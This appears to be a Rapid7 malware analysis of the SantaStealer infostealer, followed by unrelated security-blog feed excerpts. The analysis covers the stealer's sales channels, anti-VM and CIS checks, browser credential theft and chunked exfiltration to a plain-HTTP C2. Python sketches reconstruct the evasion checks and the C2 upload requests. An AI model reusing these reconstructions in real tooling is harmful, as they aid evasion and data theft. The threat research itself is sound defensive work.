Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.”
The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.
While the stealer is advertised as “fully written in C”, featuring a “custom C polymorphic engine” and being “fully undetected,” Rapid7 has found unobfuscated and unstripped SantaStealer samples that allow for an in-depth analysis. These samples can shed more light on this malware’s true level of sophistication.
In early December 2025, Rapid7 identified a Windows executable triggering a generic infostealer detection rule, which we usually see triggered by samples from the Raccoon stealer family. Initial inspection of the sample (SHA-256 beginning with 1a27…) revealed a 64-bit DLL with over 500 exported symbols (all bearing highly descriptive names such as “payload_main”, “check_antivm” or “browser_names”) and a plethora of unencrypted strings that clearly hinted at credential-stealing capabilities.
While it is not clear why the malware authors chose to build a DLL, or how the stealer payload was to be invoked by a potential stager, this choice had the (presumably unintended) effect of including the name of every single function and global variable not declared as static in the executable’s export directory. Even better, this includes symbols from statically linked libraries, which we can thus identify with minimal effort.
The statically linked libraries in this particular DLL include:
Another pair of exported symbols in the DLL are named notes_config_size and notes_config_data. These point to a string containing the JSON-encoded stealer configuration, which contains, among other things, a banner (“watermark”) with Unicode art spelling “SANTA STEALER” and a link to the stealer Telegram channel, t[.]me/SantaStealer.

Figure 1: A preview of the stealer’s configuration

Figure 2: A Telegram message from November 25th advertising the rebranded SantaStealer

Figure 3: A Telegram message announcing the rebranding and expected release schedule
Via SantaStealer’s Telegram channel, we found the affiliate web panel, where we were able to register an account and access more information provided by the operators, such as a list of features, the pricing model, and the various build configuration options. This allowed us to cross-correlate information from the panel with the configuration observed in samples and get a basic idea of the ongoing evolution of the stealer.
Apart from Telegram, the stealer is also advertised on the Lolz hacker forum at lolz[.]live/santa/. The use of this Russian-speaking forum, the web panel's top-level domain bearing the country code of the former Soviet Union (su), and the ability to configure the stealer not to target Russian-speaking victims (described later) all hint at Russian operators, which is not at all unusual on the infostealer market.

Figure 4: A list of features advertised in the web panel
As the above screenshot illustrates, the stealer operators have ambitious plans, boasting anti-analysis techniques, antivirus software bypasses, and deployment in government agencies or complex corporate networks. This is reflected in the pricing model, where a basic variant is advertised for $175 per month, and a premium variant is valued at $300 per month, as captured in the following screenshot.

Figure 5: Pricing model for SantaStealer (web panel)
In contrast to these claims, the samples we have seen so far are far from undetectable, or in any way difficult to analyze. While it is possible that the threat actor behind SantaStealer is still developing some of the advertised anti-analysis or anti-AV techniques, having samples leak before the malware is ready for production use, complete with symbol names and unencrypted strings, is a clumsy mistake. It likely thwarts much of the effort put into the stealer's development and hints at poor operational security on the part of the threat actor(s).
Interestingly, the web panel includes functionality to “scan files for malware” (i.e. check whether a file is being detected or not). While the panel assures the affiliate user that no files are shared and full anonymity is guaranteed, one may have doubts about whether this is truly the case.

Figure 6: The web panel allows affiliates to scan files for malware.
Some of the build configuration options within the web panel are shown in Figures 7 through 9.

Figure 7: SantaStealer build configuration

Figure 8: More SantaStealer build configuration options

Figure 9: SantaStealer build configuration options, including CIS countries detection
One final aspect worth pointing out is that, rather unusually, the decision whether to target countries in the Commonwealth of Independent States (CIS) is seemingly left up to the buyer and is not hardcoded, as is often the case with commercial infostealers.
Having read the advertisement of SantaStealer’s capabilities by the developers, one might be interested in seeing how they are implemented on a technical level. Here, we will explore one of the EXE samples (SHA-256 beginning with 926a…), as attempts at executing the DLL builds with rundll32.exe ran into issues with the C runtime initialization. However, the DLL builds (such as SHA-256 beginning with 1a27…) are still useful for static analysis and cross-referencing with the EXE.
At the moment, detecting and tracking these payloads is straightforward, due to the fact that both the malware configuration and the C2 server IP address are embedded in the executable in plain text. However, if SantaStealer does turn out to be competitive and implements some form of encryption, obfuscation, or anti-analysis techniques (as seen with Lumma or Vidar), these tasks may become less trivial for the analyst. A deeper understanding of the patterns and methods utilized by SantaStealer may be beneficial.
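Because current builds carry both the JSON configuration and the C2 endpoint in plain text, a simple byte scan is enough to triage a suspected sample. The following is a minimal sketch of such a scanner; the marker strings are illustrative choices based on the strings described in this analysis, not an exhaustive signature.

```python
import re

# Illustrative marker strings observed in unobfuscated SantaStealer builds.
CONFIG_MARKERS = [b'"watermark"', b"SantaStealer", b"notes_config"]
# Plaintext IPv4:port pairs, e.g. a hard-coded C2 endpoint.
IPV4_PORT = re.compile(rb"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{2,5})\b")

def triage(sample: bytes) -> dict:
    """Return plaintext indicators found in a sample's raw bytes."""
    hits = [m.decode() for m in CONFIG_MARKERS if m in sample]
    endpoints = [
        f"{ip.decode()}:{port.decode()}"
        for ip, port in IPV4_PORT.findall(sample)
    ]
    return {"config_markers": hits, "c2_candidates": endpoints}
```

Running `triage(open(path, "rb").read())` over a sample surfaces both the config blob and candidate C2 addresses; once the developers add string encryption, this kind of naive scan stops working.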

Figure 10: Code in the send_upload_chunk exported function references plaintext strings
The user-defined entry point in the executable corresponds to the payload_main DLL export. Within this function, the stealer first checks the anti_cis and exec_delay_seconds values from the embedded config and behaves accordingly. If the CIS check is enabled and a Russian keyboard layout is detected using the GetKeyboardLayoutList API, the stealer drops an empty file named “CIS” and ends its execution. Otherwise, SantaStealer waits for the configured number of seconds before calling functions named check_antivm, payload_credentials, create_memory_based_log and creating a thread running the routine named ThreadPayload1 in the DLL exports.
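The CIS check described above boils down to inspecting the language identifier carried in each keyboard layout handle. A sketch of that logic follows; on Windows the handles would come from GetKeyboardLayoutList, but here the caller supplies them so the logic is testable anywhere, and the LANGID set is our assumption covering a few common CIS layouts rather than a list recovered from the samples.

```python
# Assumed set of CIS-associated Windows language identifiers (LANGIDs).
CIS_LANGIDS = {
    0x0419,  # Russian
    0x0422,  # Ukrainian
    0x0423,  # Belarusian
    0x043F,  # Kazakh
}

def has_cis_layout(hkl_values: list[int]) -> bool:
    """True if any keyboard layout handle carries a CIS language identifier.

    The low 16 bits of a Windows HKL encode the input language (LANGID),
    so masking with 0xFFFF recovers the language of each installed layout.
    """
    return any((hkl & 0xFFFF) in CIS_LANGIDS for hkl in hkl_values)
```

If this check fires and anti_cis is enabled, the stealer drops the empty “CIS” marker file and exits instead of collecting anything.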
The anti-VM function is self-explanatory, but its implementation differs across samples, hinting at the ongoing development of the stealer. One sample checks for blacklisted processes (by hashing the names of running process executables using a custom rolling checksum and searching for them in a blacklist), suspicious computer names (using the same method) and an “analysis environment,” which is just a hard-coded blacklist of working directories, like “C:\analysis” and similar. Another sample checks the number of running processes, the system uptime, the presence of a VirtualBox service (by means of a call to OpenServiceA with "VBoxGuest") and finally performs a time-based debugger check. In either case, if a VM or debugger is detected, the stealer ends its execution.
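The hash-based blacklist comparison in the first sample's anti-VM routine is a common trick to avoid embedding telltale tool names in plain text. The exact checksum constants were not recovered for this writeup, so the sketch below substitutes a djb2-style rolling hash to show the pattern; both the hash and the blacklisted names are illustrative.

```python
def rolling_checksum(name: str) -> int:
    """Hypothetical stand-in for the sample's custom rolling checksum
    (djb2-style); the real constants differ."""
    h = 5381
    for ch in name.lower():
        h = ((h * 33) + ord(ch)) & 0xFFFFFFFF
    return h

# The binary stores only hashes, so analysis-tool names never appear as
# plaintext strings. The names hashed here are illustrative examples.
BLACKLIST = {
    rolling_checksum(n)
    for n in ("wireshark.exe", "procmon.exe", "x64dbg.exe")
}

def is_blacklisted(process_name: str) -> bool:
    return rolling_checksum(process_name) in BLACKLIST
```

The same hash-and-compare scheme is reused for suspicious computer names, which is why both checks can share one helper in the samples.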
Next, payload_credentials attempts to steal browser credentials, including passwords, cookies, and saved credit cards. For Chromium-based browsers, this involves bypassing a mechanism known as AppBound Encryption (ABE). For this purpose, SantaStealer embeds an additional executable, either as a resource or directly in section data, which is either dropped to disk and executed (screenshot below), or loaded and executed in-memory, depending on the sample.

Figure 11: Execution of an embedded executable specialized in browser hijacking
The extracted executable, in turn, contains an encrypted DLL in its resources, which is decrypted using two consecutive invocations of ChaCha20 with two distinct pairs of 32-byte key and 12-byte nonce. This DLL exports functions called ChromeElevator_Initialize, ChromeElevator_ProcessAllBrowsers and ChromeElevator_Cleanup, which are called by the executable in that order. Based on the symbol naming, as well as usage of ChaCha20 encryption for obfuscation and presence of many recognizable strings, we assess with moderate confidence that this executable and DLL are heavily based on code from the "ChromElevator" project (https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption), which employs direct syscall-based reflective process hollowing to inject code into the target browser. Hijacking the security context of a legitimate browser process this way allows the attacker to decrypt AppBound encryption keys and thereby decrypt stored credentials.

Figure 12: The embedded EXE decrypts and loads a DLL in-memory and calls its exports.
The next function called from main, create_memory_based_log, demonstrates the modular design of the stealer. For each included module, it creates a thread running the module_thread routine with an incremented numerical ID for that module, starting at 0. It then waits for 45 seconds before joining all thread handles and writing all files collected in-memory into a ZIP file named “Log.zip” in the TEMP directory.
The module_thread routine simply takes the index it was passed as parameter and calls a handler function at that index in a global table, for some reason called memory_generators in the DLL. The module function takes only a single output parameter, which is the number of files it collected. In the so helpfully annotated DLL build, we can see 14 different modules. Besides generic modules for reading environment variables, taking screenshots, or grabbing documents and notes, there are specialized modules for stealing data from the Telegram desktop application, Discord, Steam, as well as browser extensions, histories and passwords.
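The collection flow described in the last two paragraphs can be reconstructed compactly: one thread per module index, a global dispatch table (the DLL's memory_generators), and the results zipped entirely in memory. The module bodies below are illustrative stubs, not decompiled code.

```python
import io
import threading
import zipfile

collected: dict[str, bytes] = {}  # stand-in for the in-memory file store
lock = threading.Lock()

def env_module() -> int:
    with lock:
        collected["env.txt"] = b"PATH=..."
    return 1  # number of files collected, the module's only output

def screenshot_module() -> int:
    with lock:
        collected["screen.png"] = b"\x89PNG..."
    return 1

MEMORY_GENERATORS = [env_module, screenshot_module]  # index -> handler

def module_thread(index: int) -> None:
    """Dispatch to the handler at the given index, as in the samples."""
    MEMORY_GENERATORS[index]()

def create_memory_based_log() -> bytes:
    threads = [threading.Thread(target=module_thread, args=(i,))
               for i in range(len(MEMORY_GENERATORS))]
    for t in threads:
        t.start()
    for t in threads:  # the real stealer waits 45 seconds before joining
        t.join()
    buf = io.BytesIO()  # "Log.zip" is built in memory, then written to TEMP
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in collected.items():
            zf.writestr(name, data)
    return buf.getvalue()
```

The fixed 45-second collection window is notable: any module still running when the timer expires simply contributes whatever it has managed to gather.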

Figure 13: A list of named module functions in a SantaStealer sample
Finally, after all the files have been collected, ThreadPayload1 is run in a thread. It sleeps for 15 seconds and then calls payload_send, which in turn calls send_zip_from_memory_0, which splits the ZIP into 10 MB chunks that are uploaded using send_upload_chunk.
The file chunks are exfiltrated over plain HTTP to an /upload endpoint on a hard-coded C2 IP address on port 6767, with only a couple special headers:
User-Agent: upload
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary[...]
auth: [...]
w: [...]
complete: true (only on final request)
The auth header appears to be a unique build ID, and w is likely the optional “tag” used to distinguish between campaigns or “traffic sources”, as is mentioned in the features.
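The exfiltration scheme above can be sketched as follows. The code only builds the chunked requests rather than sending them; the boundary string is truncated as in the observed traffic, and the auth and tag values are placeholders for the per-build ID and campaign tag.

```python
CHUNK_SIZE = 10 * 1024 * 1024  # ZIP is split into 10 MB chunks

def build_upload_requests(zip_bytes: bytes, c2: str, auth: str, tag: str):
    """Describe the plain-HTTP upload requests SantaStealer would issue."""
    chunks = [zip_bytes[i:i + CHUNK_SIZE]
              for i in range(0, len(zip_bytes), CHUNK_SIZE)]
    requests = []
    for n, chunk in enumerate(chunks):
        headers = {
            "User-Agent": "upload",
            # Boundary truncated; real traffic appends a random suffix.
            "Content-Type": "multipart/form-data; "
                            "boundary=----WebKitFormBoundary",
            "auth": auth,  # apparent unique build ID
            "w": tag,      # optional campaign / traffic-source tag
        }
        if n == len(chunks) - 1:
            headers["complete"] = "true"  # only on the final request
        requests.append({"url": f"http://{c2}:6767/upload",
                         "headers": headers, "body": chunk})
    return requests
```

Because everything travels over unencrypted HTTP with these fixed headers, the traffic is trivially fingerprintable on the wire, which matches our assessment of the stealer's current stealth level.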
The SantaStealer malware is in active development, set to release sometime in the remainder of this month or in early 2026. Our analysis of the leaked builds reveals a modular, multi-threaded design fitting the developers’ description. Some, but not all, of the improvements described in SantaStealer’s Telegram channel are reflected in the samples we were able to analyze. For one, the malware can be seen shifting to a completely fileless collection approach, with modules and the Chrome decryptor DLL being loaded and executed in-memory. On the other hand, the anti-analysis and stealth capabilities of the stealer advertised in the web panel remain very basic and amateurish, with only the third-party Chrome decryptor payload being somewhat hidden.
To avoid getting infected with SantaStealer, be wary of unrecognized links and e-mail attachments. Watch out for fake human-verification prompts or technical-support instructions asking you to run commands on your computer. Finally, avoid running any kind of unverified code from sources such as pirated software, video game cheats, and unverified plugins and extensions.
Stay safe and off the naughty list!
Customers using Rapid7’s Intelligence Hub gain direct access to SantaStealer IOCs, along with ongoing intelligence on new activity and related campaigns. The platform also has detections for a wide range of other infostealers, including Lumma, StealC, RedLine, and more, giving security teams broader visibility into emerging threats.
SantaStealer DLLs with exported symbols (SHA-256)
SantaStealer EXEs (SHA-256)
SantaStealer C2s
MITRE ATT&CK

You’ve spent weeks, maybe months, crafting your dream Electron app. The UI looks clean, the features work flawlessly, and you finally hit that Build button. Excited, you send the installer to your friend for testing. You’re expecting a “Wow, this is awesome!” Instead, you get: “Windows protected your PC. Unknown Publisher.” That bright blue SmartScreen…
The post How to Sign a Windows App with Electron Builder? appeared first on SignMyCode - Resources.
Explore how AI-driven threat detection can secure Model Context Protocol (MCP) deployments from data manipulation attempts, with a focus on post-quantum security.
The post AI-powered threat detection for MCP data manipulation attempts appeared first on Security Boulevard.
How a simple “I found your photo” message can quietly take over your account
The post The WhatsApp takeover scam that doesn’t need your password appeared first on Security Boulevard.
There's a strange thing that happens when a person you once knew as your child seems, over years, to forget the sound of your voice, the feel of your laugh, or the way your presence once grounded them. It isn't just loss - it's an internal inversion: your love becomes a shadow. Something haunting, familiar, yet painful to face.
I know this because I lived it - decade after decade - as the father of two sons, now ages 28 and 26. What has stayed with me isn't just the external stripping away of connection, but the internal fracture it caused in myself.
Some days I felt like the person I was before alienation didn't exist anymore. Not because I lost my identity, but because I was forced to confront parts of myself I never knew were there - deep fears, hidden hopes, unexamined beliefs about love, worth, and attachment.
This isn't a story of blame. It's a story of honesty with the inner terrain - the emotional geography that alienation carved into my heart.
Love doesn't disappear when a child's affection is withdrawn. Instead, it changes shape. It becomes more subtle, less spoken, but no less alive.
When your kids are little, love shows up in bedtime stories, laughter, scraped knees, and easy smiles. When they're adults and distant, love shows up in the quiet hurt - the way you notice an empty chair, or a text that never came, or the echo of a memory that still makes your heart ache.
This kind of love doesn't vanish. It becomes a quiet force pulling you inward - toward reflection instead of reaction, toward steadiness instead of collapse.
There's a psychological reality at play here that goes beyond custody schedules, angry words, or fractured holidays. When a person - especially a young person - bonds with one attachment figure and rejects another, something profound is happening in the architecture of their emotional brain.
In some dynamics of parental influence, children form a hyper‑focused attachment to one caregiver and turn away from the other. That pattern isn't about rational choice but emotional survival. Attachment drives us to protect what feels safe and to fear what feels unsafe - even when the fear isn't grounded in reality. High Conflict Institute
When my sons leaned with all their emotional weight toward their mother - even to the point of believing impossible things about me - it was never just "obedience." It was attachment in overdrive: a neural pull toward what felt like safety, acceptance, or approval. And when that sense of safety was threatened by even a hint of disapproval, the defensive system in their psyche kicked into high gear.
This isn't a moral judgment. It's the brain trying to survive.
Here's the part no one talks about in polite conversation:
You can love someone deeply and grieve their absence just as deeply - at the same time.
It's one of the paradoxes that stays with you long after the world expects you to "move on."
You can hope that the door will open someday
and you can also acknowledge it may never open in this lifetime.
You can forgive the emotional wounds that were inflicted
and also mourn the lost years that you'll never get back.
You can love someone unconditionally
and still refuse to let that love turn into self‑erosion.
This tension - this bittersweet coexistence - becomes a part of your inner life.
This is where the real work lives.
When children grow up in an environment where one caregiver's approval feels like survival, the attachment system can begin to over‑regulate itself. Instead of trust being distributed across relationships, it narrows. The safe figure becomes everything. The other becomes threatening by association, even when there's no rational basis for fear. Men and Families
For my sons, that meant years of believing narratives that didn't fit reality - like refusing to consider documented proof of child support, or assigning malicious intent to benign situations. When confronted with facts, they didn't question the narrative - they rationalized it to preserve the internal emotional logic they had built around attachment and fear.
That's not weakness. That's how emotional survival systems work.
One of the hardest lessons is learning to hold ambivalence without distortion. In healthy relational development, people can feel both love and disappointment, both closeness and distance, both gratitude and grief - all without collapsing into one extreme or the other.
But in severe attachment distortion, the emotional brain tries to eliminate complexity - because complexity feels dangerous. It feels unstable. It feels like uncertainty. And the emotional brain prefers certainty, even if that certainty is painful. Karen Woodall
Learning to tolerate ambiguity - that strange space where love and loss coexist - becomes a form of inner strength.
I write this not to indict, accuse, or vilify anyone. The human psyche is far more complicated than simple cause‑and‑effect. What I've learned - through years of quiet reflection - is that:
Attachment wounds run deep, and they can overshadow logic and memory.
People don't reject love lightly. They reject fear and threat.
Healing isn't an event. It's a series of small acts of awareness and presence.
Your internal world is the only place you can truly govern. External reality is negotiable - inner life is not.
I have a quiet hope - not a loud demand - that one day my sons will look back and see the patterns that were invisible to them before. Not to blame. Not to re‑assign guilt. But to understand.
Hope isn't a promise. It's a stance of openness - a willingness to stay emotionally available without collapsing into desperation.
Healing isn't about winning back what was lost. It's about cultivating a life that holds the loss with compassion and still knows how to turn toward joy when it appears - quietly, softly, unexpectedly.
Your heart doesn't have to choose between love and grief. It can carry both.
And in that carrying, something deeper begins to grow.
Parental Alienation & Emotional Impact
International Society for the New Definition of Abuse & Family Violence - overview on parental alienation as child abuse: https://isnaf.info/our-mission-2/
Research on adult impacts of alienating behaviours (mental health, trauma, identity): https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9026878/
Attachment & Alienation Theory
Attachment and alienation discussion from High Conflict Institute: https://www.highconflictinstitute.com/attachment-and-alienation/
Attachment‑based model of parental alienation (PDF overview): https://menandfamilies.org/wp-content/uploads/2021/10/An-Attachment-Based-Model-of-Parental-Alienation-Foundations.pdf
General Parental Alienation Background
Wikipedia on parental alienation (neutral background): https://en.wikipedia.org/wiki/Parental_alienation
The post When Love Becomes a Shadow: The Inner Journey After Parental Alienation appeared first on Security Boulevard.
In cybersecurity, being “always on” is often treated like a badge of honor.
We celebrate the leaders who respond at all hours, who jump into every incident, who never seem to unplug. Availability gets confused with commitment. Urgency gets mistaken for effectiveness. And somewhere along the way, exhaustion becomes normalized—if not quietly admired.
But here’s the uncomfortable truth:
Always-on leadership doesn’t scale. And over time, it becomes a liability.
I’ve seen it firsthand, and if you’ve spent any real time in high-pressure security environments, you probably have too.
The Myth of Constant Availability
Cybersecurity is unforgiving. Threats don’t wait for business hours. Incidents don’t respect calendars. That reality creates a subtle but dangerous expectation: real leaders are always reachable.
The problem isn’t short-term intensity. The problem is when intensity becomes an identity.
When leaders feel compelled to be everywhere, all the time, a few things start to happen:
Decision quality quietly degrades
Teams become dependent instead of empowered
Strategic thinking gets crowded out by reactive work
From the outside, it can look like dedication. From the inside, it often feels like survival mode.
And survival mode is a terrible place to lead from.
Burnout isn’t just about being tired. It’s about losing margin—mental, emotional, and strategic margin.
Leaders without margin:
Default to familiar solutions instead of better ones
React instead of anticipate
Solve today’s problem at the expense of tomorrow’s resilience
In cybersecurity, that’s especially dangerous. This field demands clarity under pressure, judgment amid noise, and the ability to zoom out when everything is screaming “zoom in.”
When leaders are depleted, those skills are the first to go.
One of the biggest mindset shifts I’ve seen in effective leaders is this:
They stop trying to be the system and start building one.
That means:
Creating clear decision boundaries so teams don’t need constant escalation
Trusting people with ownership, not just tasks
Designing escalation paths that protect focus instead of destroying it
This isn’t about disengaging. It’s about leading intentionally.
Ironically, the leaders who are least available at all times are often the ones whose teams perform best—because the system works even when they step away.
There’s a difference between being reachable and being present.
Presence is about:
Showing up fully when it matters
Making thoughtful decisions instead of fast ones
Modeling sustainable behavior for teams that are already under pressure
When leaders never disconnect, they send a message—even if unintentionally—that rest is optional and boundaries are weakness. Over time, that culture burns people out long before the threat landscape does.
Good leaders protect their teams.
Great leaders also protect their own capacity to lead.
In a field obsessed with uptime, response times, and coverage, it’s worth asking a harder question:
If I stepped away for a week, would things fall apart—or function as designed?
If the answer is “fall apart,” that’s not a personal failure. It’s a leadership signal. One that points to opportunity, not inadequacy.
The strongest leaders I know aren’t always on.
They’re intentional. They’re disciplined. And they understand that long-term effectiveness requires more than endurance—it requires self-mastery.
In cybersecurity especially, that might be the most underrated leadership skill of all.
World Health Organization (WHO) — Burn-out an “occupational phenomenon” (ICD-11 overview)
https://www.who.int/news/item/28-05-2019-burn-out-an-occupational-phenomenon-international-classification-of-diseases
World Health Organization (WHO) — Burn-out: an occupational phenomenon (FAQ / definition)
https://www.who.int/standards/classifications/frequently-asked-questions/burn-out-an-occupational-phenomenon
Harvard Business Review — When You’re the Executive Everyone Relies On—and You’re Burning Out (Oct 9, 2025)
https://hbr.org/2025/10/when-youre-the-executive-everyone-relies-on-and-youre-burning-out
Harvard Business Review — Preventing Burnout Is About Empathetic Leadership (Sep 28, 2020)
https://hbr.org/2020/09/preventing-burnout-is-about-empathetic-leadership
Google Site Reliability Engineering (SRE Book) — Eliminating Toil
https://sre.google/sre-book/eliminating-toil/
Google SRE Workbook — Eliminating Toil (operational efficiency)
https://sre.google/workbook/eliminating-toil/
NIST — SP 800-61r3 (PDF): Incident Response Recommendations and Considerations for Cybersecurity Risk Management (CSF 2.0 Community Profile)
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r3.pdf
NIST CSRC — SP 800-61r3 publication landing page
https://csrc.nist.gov/pubs/sp/800/61/r3/ipd
NIST News — NIST Revises SP 800-61 (incident response recommendations)
https://www.nist.gov/news-events/news/2025/04/nist-revises-sp-800-61-incident-response-recommendations-and-considerations
CDC / NIOSH — Stress…At Work (NIOSH Publication No. 99-101)
https://www.cdc.gov/niosh/docs/99-101/default.html
OSHA — Workplace Stress: Guidance and Tips for Employers
https://www.osha.gov/workplace-stress/employer-guidance
Mind Garden — Maslach Burnout Inventory (MBI) (official distributor page)
https://www.mindgarden.com/117-maslach-burnout-inventory-mbi
Training Industry — Developing Conscious Leaders for a Fast-Changing World
https://trainingindustry.com/articles/leadership/developing-conscious-leaders-for-a-fast-changing-world/
The post The Burnout Nobody Talks About: When “Always-On” Leadership Becomes a Liability appeared first on Security Boulevard.
How Do Non-Human Identities Transform Cloud Security Management? Could your cloud security management strategy be missing a vital component? As cybersecurity evolves, the focus has expanded beyond traditional human operatives to encompass Non-Human Identities (NHIs). Understanding NHIs and their role in modern cloud environments is crucial for industries ranging from financial services to healthcare. This […]
The post How does Agentic AI affect compliance in the cloud appeared first on Entro.
How Do Non-Human Identities Impact Cybersecurity? What role do Non-Human Identities (NHIs) play in cybersecurity risks? With machine-to-machine interactions burgeoning, understanding NHIs becomes critical for any organization aiming to secure its cloud environments effectively. Decoding Non-Human Identities in the Cybersecurity Sphere Non-Human Identities are the machine identities that enable vast numbers of applications, services, and […]
The post What risks do NHIs pose in cybersecurity appeared first on Entro.
Is Your Organization Prepared for the Evolving Landscape of Non-Human Identities? Managing non-human identities (NHIs) has become a critical focal point for organizations, especially for those using cloud-based platforms. But how can businesses ensure they are adequately protected against the evolving threats targeting machine identities? The answer lies in adopting a strategic and comprehensive approach […]
The post How Agentic AI shapes the future of travel industry security appeared first on Entro.
The Digital Operational Resilience Act (DORA) is now in full effect, and financial institutions across the EU face mounting pressure to demonstrate robust ICT risk management and cyber resilience. With...
The post DORA Compliance Checklist for Cybersecurity appeared first on Security Boulevard.
Official AppOmni Company Information AppOmni delivers continuous SaaS security posture management, threat detection, and vital security insights into SaaS applications. Uncover hidden risks, prevent data exposure, and gain total control over your SaaS environments with an all-in-one platform. AppOmni Overview Mission: AppOmni’s mission is to prevent SaaS data breaches by securing the applications that power […]
The post Official AppOmni Company Information appeared first on AppOmni.
Amazon Web Services (AWS) today published a report detailing a series of cyberattacks occurring over multiple years attributable to Russia’s Main Intelligence Directorate (GRU) that were aimed primarily at the energy sector in North America, Europe and the Middle East. The latest Amazon Threat Intelligence report concludes that the cyberattacks have been evolving since 2021,..
The post AWS Report Links Multi-Year Effort to Compromise Cloud Services to Russia appeared first on Security Boulevard.
“Start by doing what’s necessary; then do what’s possible; and suddenly you are doing the impossible.” – St. Francis of Assisi In the 12th century, St. Francis wasn’t talking about digital systems, but his advice remains startlingly relevant for today’s AI governance challenges. Enterprises are suddenly full of AI agents such as copilots embedded in …
The post Your AI Agents Aren’t Hidden. They’re Ungoverned. It’s time to Act appeared first on Security Boulevard.
State, Local, Tribal, and Territorial (SLTT) governments operate the systems that keep American society functioning: 911 dispatch centers, water treatment plants, transportation networks, court systems, and public benefits portals. When these digital systems are compromised, the impact is immediate and physical. Citizens cannot call for help, renew licenses, access healthcare, or receive social services. Yet
The post The State of U.S. State and Local Government Cybersecurity (2024-2025): Why Unified AI Defense Is Now Essential appeared first on Seceon Inc.
A data breach of credit reporting and ID verification services firm 700Credit affected 5.6 million people, allowing hackers to steal personal information of customers of the firm's client companies. 700Credit executives said the breach happened after bad actors compromised the system of a partner company.
The post Hackers Steal Personal Data in 700Credit Breach Affecting 5.6 Million appeared first on Security Boulevard.
ServiceNow Inc. is in advanced talks to acquire cybersecurity startup Armis in a deal that could reach $7 billion, its largest ever, according to reports. Bloomberg News first reported the discussions over the weekend, noting that an announcement could come within days. However, sources cautioned that the deal could still collapse or attract competing bidders...
The post ServiceNow in Advanced Talks to Acquire Armis for $7 Billion: Reports appeared first on Security Boulevard.
Session 6A: LLM Privacy and Usable Privacy
Authors, Creators & Presenters: Xiaoyuan Wu (Carnegie Mellon University), Lydia Hu (Carnegie Mellon University), Eric Zeng (Carnegie Mellon University), Hana Habib (Carnegie Mellon University), Lujo Bauer (Carnegie Mellon University)
PAPER
Transparency or Information Overload? Evaluating Users' Comprehension and Perceptions of the iOS App Privacy Report
Apple's App Privacy Report, released in 2021, aims to inform iOS users about apps' access to their data and sensors (e.g., contacts, camera) and, unlike other privacy dashboards, what domains are contacted by apps and websites. To evaluate the effectiveness of the privacy report, we conducted semi-structured interviews to examine users' reactions to the information, their understanding of relevant privacy implications, and how they might change their behavior to address privacy concerns. Participants easily understood which apps accessed data and sensors at certain times on their phones, and knew how to remove an app's permissions in case of unexpected access. In contrast, participants had difficulty understanding apps' and websites' network activities. They were confused about how and why network activities occurred, overwhelmed by the number of domains their apps contacted, and uncertain about what remedial actions they could take against potential privacy threats. While the privacy report and similar tools can increase transparency by presenting users with details about how their data is handled, we recommend providing more interpretation or aggregation of technical details, such as the purpose of contacting domains, to help users make informed decisions.
ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.
Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their creators', authors', and presenters' superb NDSS Symposium 2025 conference content on the organization's YouTube channel.
The post NDSS 2025 – Evaluating Users’ Comprehension and Perceptions of the iOS App Privacy Report appeared first on Security Boulevard.
Your employees are using AI whether you’ve sanctioned it or not. And even if you’ve carefully vetted and approved an enterprise-grade AI platform, you’re still at risk of attacks and data leakage.
Security leaders are grappling with three types of risks from sanctioned and unsanctioned AI tools. First, there’s shadow AI, all those AI tools that employees use without the approval or knowledge of IT. Then there are the risks that come with sanctioned platforms and agents. If those weren’t enough, you still have to prevent the exposure of sensitive information.
The prevalence of AI use in the workplace is clear: a recent survey by CybSafe and the National Cybersecurity Alliance shows that 65% of respondents are using AI. More than four in 10 (43%) admit to sharing sensitive information with AI tools without their employer’s knowledge. If you haven’t already implemented an AI acceptable use policy, it’s time to get moving. An AI acceptable use policy is an important first step in addressing shadow AI, risky platforms and agents, and data leakage. Let’s dig into each of these three risks and the steps you can take to protect your organization.
The key risks: Each unsanctioned shadow AI tool represents an unmanaged element of your attack surface, where data can leak or threats can enter. For security teams, shadow AI expands the organization's attack surface with unvetted tools, vulnerabilities, and integrations that existing security controls can’t see. The result? You can’t govern AI use. You can try to block it. But, as we’ve learned from other shadow IT trends, you really can’t stop it. So, how can you reduce risk while meeting the needs of the business?
The key risks: Good AI governance means moving users from risky shadow AI to sanctioned enterprise environments. But sanctioned or not, AI platforms introduce unique risks. Threat actors can use sophisticated techniques like prompt injection to trick the tool into ignoring its guardrails. They might employ model manipulation to poison the underlying LLM model and cause exfiltration of private data. In addition, the tools themselves can raise issues related to data privacy, data residency, insecure data sharing, and bias. Knowing what to look for in an enterprise-grade AI vendor is the first step.
The key risks: Even if you’ve done your best to educate employees about shadow AI and performed your due diligence in choosing enterprise AI tools to sanction for use, data leakage remains a risk. Two common pathways for data leakage are:
When your employees adopt AI, you don't have to choose between innovation and security. The unified exposure management approach of Tenable One allows you to discover all AI use with Tenable AI Aware and then protect your sensitive data with Tenable AI Exposure. This combination gives you visibility and enables you to manage your attack surface while safely embracing the power of AI.
Let’s briefly explore how these solutions can help you across the areas we covered in this post:
Unsanctioned AI usage across your organization creates an unmanaged attack surface and a massive blind spot for your security team. Tenable AI Aware can discover all sanctioned and unsanctioned AI usage across your organization. Tenable AI Exposure gives your security teams visibility into the sensitive data that’s exposed so you can enforce policies and control AI-related risks.
